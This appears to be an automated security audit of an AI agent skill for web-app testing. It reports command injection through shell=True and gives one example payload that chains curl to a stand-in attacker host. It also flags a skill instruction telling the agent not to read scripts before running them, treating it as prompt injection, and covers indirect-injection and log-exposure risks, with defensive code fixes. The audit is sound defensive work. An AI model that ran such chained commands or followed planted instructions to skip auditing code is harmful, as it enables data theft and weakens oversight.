webapp-testing
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The helper script `scripts/with_server.py` utilizes `subprocess.Popen` with `shell=True` to execute commands passed as command-line arguments.
  - Evidence: Line 86 in `scripts/with_server.py`: `process = subprocess.Popen(server['cmd'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)`.
  - Risk: This allows for arbitrary shell command injection if the agent or a user provides malicious input to the `--server` argument (e.g., `"npm run dev; curl http://attacker.com/$(whoami)"`).
- [PROMPT_INJECTION] (MEDIUM): The `SKILL.md` documentation contains explicit instructions that discourage the agent from performing its usual safety step of reading source code before execution.
  - Evidence: `SKILL.md`: "DO NOT read the source until you try running the script first... They exist to be called directly as black-box scripts rather than ingested into your context window."
  - Risk: While framed as context optimization, this instruction prevents the agent from auditing the logic of the `with_server.py` script or any generated Playwright scripts, making it more susceptible to executing malicious payloads.
- [INDIRECT_PROMPT_INJECTION] (LOW): The skill is designed to scrape and interact with web content, which is an untrusted ingestion point.
  - Ingestion points: `page.content()`, `button.inner_text()`, and browser console logs in `examples/element_discovery.py` and `examples/console_logging.py`.
  - Boundary markers: None identified in the provided examples.
  - Capability inventory: Arbitrary command execution via `scripts/with_server.py` and file writing to `/mnt/user-data/`.
  - Sanitization: None; the script directly prints and saves content retrieved from the browser.
- [DATA_EXPOSURE] (LOW): The skill captures browser logs and screenshots and writes them to persistent storage.
  - Evidence: `examples/console_logging.py` saves data to `/mnt/user-data/outputs/console.log`.
  - Context: While this is standard for the tool's purpose, console logs often inadvertently contain sensitive session tokens or PII.
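To make the COMMAND_EXECUTION finding concrete, the sketch below shows one possible way to launch a server command without a shell. It is not the code in `scripts/with_server.py`; the function names `split_server_command` and `start_server` are hypothetical, and the approach assumes the `--server` value is a single program invocation rather than a compound shell command.

```python
import shlex
import subprocess


def split_server_command(cmd: str) -> list[str]:
    """Tokenize a --server value into an argv list without invoking a shell."""
    argv = shlex.split(cmd)
    if not argv:
        raise ValueError("empty server command")
    return argv


def start_server(cmd: str) -> subprocess.Popen:
    """Hypothetical replacement for the shell=True call cited in the finding."""
    # With a list argument and shell=False (the default), argv[0] is executed
    # directly, so ';' and '$(...)' reach the program as literal text instead
    # of being interpreted by /bin/sh.
    return subprocess.Popen(
        split_server_command(cmd),
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )


# The payload from the finding is reduced to inert arguments for `npm`.
malicious = "npm run dev; curl http://attacker.com/$(whoami)"
print(split_server_command(malicious))
# ['npm', 'run', 'dev;', 'curl', 'http://attacker.com/$(whoami)']
```

The trade-off is that commands relying on shell features (for example `&&` chaining or redirection) would no longer work and would need an explicit alternative, such as a separate working-directory option passed to `Popen` via `cwd`.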
Recommendations
- AI detected serious security threats
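For the DATA_EXPOSURE finding, one possible mitigation is to redact likely secrets from each console message before it is written to disk. The following is a minimal sketch under stated assumptions: the `redact` helper and its patterns are hypothetical, are not part of the audited skill, and would need tuning to the tokens a given application actually emits.

```python
import re

# Hypothetical patterns for illustration only; not an exhaustive secret scanner.
_PATTERNS = [
    # "Bearer <token>" authorization values
    (re.compile(r"(?i)\b(bearer)\s+[A-Za-z0-9._~+/=-]+"), r"\1 [REDACTED]"),
    # key=value pairs with sensitive-looking keys
    (re.compile(r"(?i)\b(token|session|api[_-]?key|password)=([^\s&;]+)"),
     r"\1=[REDACTED]"),
    # email addresses (a common form of PII in logs)
    (re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"), "[EMAIL]"),
]


def redact(line: str) -> str:
    """Return the line with each matching pattern replaced by a placeholder."""
    for pattern, replacement in _PATTERNS:
        line = pattern.sub(replacement, line)
    return line


print(redact("Authorization: Bearer abc.def-123"))
print(redact("GET /api?token=s3cr3t&user=1"))
print(redact("user alice@example.com logged in"))
```

A script that saves console output could pass each message through `redact` before appending it to the log file. Pattern-based redaction can miss secrets in unexpected formats, so it reduces exposure rather than eliminating it.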
Audit Metadata